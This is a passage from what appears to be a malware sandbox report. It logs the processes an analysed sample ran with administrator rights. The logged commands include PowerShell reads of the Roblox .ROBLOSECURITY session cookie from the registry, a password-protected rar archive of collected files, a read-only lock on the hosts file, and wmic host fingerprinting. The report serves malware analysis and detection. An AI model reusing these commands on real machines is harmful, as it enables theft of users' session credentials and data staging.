                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff7a5370000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff72bec0000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:95
                                                                                                                                                                                                                            Start time:02:42:04
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:96
                                                                                                                                                                                                                            Start time:02:42:04
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:97
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
                                                                                                                                                                                                                            Imagebase:0x7ff6b2a50000
                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
                                                                                                                                                                                                                            Imagebase:0x7ff6bbcb0000
                                                                                                                                                                                                                            File size:630'736 bytes
                                                                                                                                                                                                                            MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:106
                                                                                                                                                                                                                            Start time:02:42:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:107
                                                                                                                                                                                                                            Start time:02:42:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:108
                                                                                                                                                                                                                            Start time:02:42:19
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic os get Caption
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:109
                                                                                                                                                                                                                            Start time:02:42:20
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:110
                                                                                                                                                                                                                            Start time:02:42:20
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:111
                                                                                                                                                                                                                            Start time:02:42:21
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:112
                                                                                                                                                                                                                            Start time:02:42:21
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:113
                                                                                                                                                                                                                            Start time:02:42:21
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:114
                                                                                                                                                                                                                            Start time:02:42:21
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:115
                                                                                                                                                                                                                            Start time:02:42:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:116
                                                                                                                                                                                                                            Start time:02:42:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                            Start time:02:42:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
